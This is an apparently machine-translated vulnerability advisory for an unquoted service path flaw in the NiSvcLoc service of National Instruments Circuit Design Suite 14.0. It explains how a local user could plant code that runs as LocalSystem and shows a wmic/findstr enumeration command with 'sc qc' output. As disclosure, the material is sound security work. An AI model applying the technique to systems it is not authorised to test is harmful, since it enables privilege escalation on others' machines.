National Instruments Circuit Design Suite 14.0 – Local Privilege Escalation
# Exploit Title: Suíte de Design de Circuito da National Instruments 14.0 – Escalação de Privilégios Locais
# Data da descoberta: 10-10-2019
# Exploit Autor: Ivan Marmolejo
# Página inicial do fornecedor: http://www.ni.com/en-us.html
# Link do software: https://www.ni.com/pt-br/shop/select/circuit-design-suite
# Versão: 14.0
# Tipo de vulnerabilidade: Local
# Testado em: Windows 10 Pro x64 Esp
# Versão: 10.0.18362
# Exploit.txt
########################################################### ########################################################### ##########################################
Resumo: O Circuit Design Suite combina os softwares Multisim e Ultiboard para oferecer um conjunto completo de ferramentas para design de circuitos, simulação,
validação e design. O Circuit Design Suite ajuda a projetar circuitos com ferramentas intuitivas e econômicas. Você pode executar um
Simulação SPICE e faça uma transição perfeita para o software de design e roteamento de PCB. Criada para educação, pesquisa e design, a suíte oferece
recursos avançados de simulação para fornecer uma visão clara de como os circuitos se comportam em qualquer situação.
Descrição: o aplicativo sofre de um problema de caminho de pesquisa não cotado que afeta o serviço ‘NiSvcLoc’. Isso poderia potencialmente permitir uma
usuário local autorizado mas sem privilégios para executar código arbitrário com privilégios elevados no sistema. Uma tentativa bem sucedida exigiria
o usuário local possa inserir seu código no caminho raiz do sistema não detectado pelo SO ou por outros aplicativos de segurança onde
potencialmente ser executado durante a inicialização ou reinicialização do aplicativo. Se for bem-sucedido, o código do usuário local será executado com os privilégios elevados
do aplicativo.
########################################################### ########################################################### ##########################################
Etapa para descobrir o serviço não citado:
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
NI Service Locator NiSvcLoc C:\Program Files (x86)\National Instruments\Shared\niSvcLoc\nisvcloc.exe -s Auto
##############################################################################################################################################
Service info:
C:\Users\user>sc qc NiSvcLoc
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: NiSvcLoc
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\National Instruments\Shared\niSvcLoc\nisvcloc.exe -s
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : NI Service Locator
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
##############################################################################################################################################